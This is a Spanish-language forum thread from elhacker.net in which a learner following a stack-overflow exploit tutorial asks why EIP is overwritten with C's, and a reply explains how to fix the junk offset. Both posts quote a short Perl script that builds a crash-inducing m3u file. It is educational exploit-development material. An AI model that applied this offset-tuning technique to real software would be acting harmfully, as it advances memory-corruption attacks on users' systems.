elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  confusion!		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: confusion!  (Leído 742 veces)
0x3c

Desconectado Desconectado

Mensajes: 107


learning, making mistakes, having fun


Ver Perfil
confusion!
« en: 11 Enero 2013, 09:49 »
saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
En línea
Si Vis Pacem, Para Bellum.

Another Legend Has Fallen
ThePinkPanther

Desconectado Desconectado

Mensajes: 54



Ver Perfil
Re: confusion!
« Respuesta #1 en: 26 Enero 2013, 23:54 »
Cita de: 0x3c en 11 Enero 2013, 09:49
saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
Eip se llena con c , porque esta mal la parte del codigo
print $FILE $junk.$eip.$espdata; , en sintaxis esto esta bien , porque llenar llena pero con C , porque no llega $junk al punto justo donde se sobreeescribe eip , fijate el punto justo donde EIP es sobreescrito , y modifica esto :

my $junk= "A" x 26094;

por :  "A" x "EL numero entero justo -1 donde se escribe EIP."

Saludos.
En línea
On joue dans un chambaras
La fierté, la loi
Tue, comme un bon vieux colosawa
La main sur le katana
Même si la peur m'assaille
Je partirai comme un samurai
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Confusion con Ip's
Hacking Básico 		ch3k0 1 577 Último mensaje 14 Abril 2005, 17:09
por el-brujo
Confusion
Seguridad 		coyituu 1 512 Último mensaje 11 Marzo 2006, 00:22
por Robokop
Confusion con no-ip
Dudas Generales 		SalvadorDali 1 374 Último mensaje 7 Diciembre 2006, 05:30
por дٳŦ٭
confusion
Desarrollo Web 		cker 5 729 Último mensaje 14 Noviembre 2011, 21:21
por cker
confusion y duda en placabase-RAM (SOLUCIONADO)
Hardware 		noker613 5 1,522 Último mensaje 5 Enero 2012, 23:03
por Aprendiz-0scuro
Powered by SMF 1.1.18 | SMF © 2006-2008, Simple Machines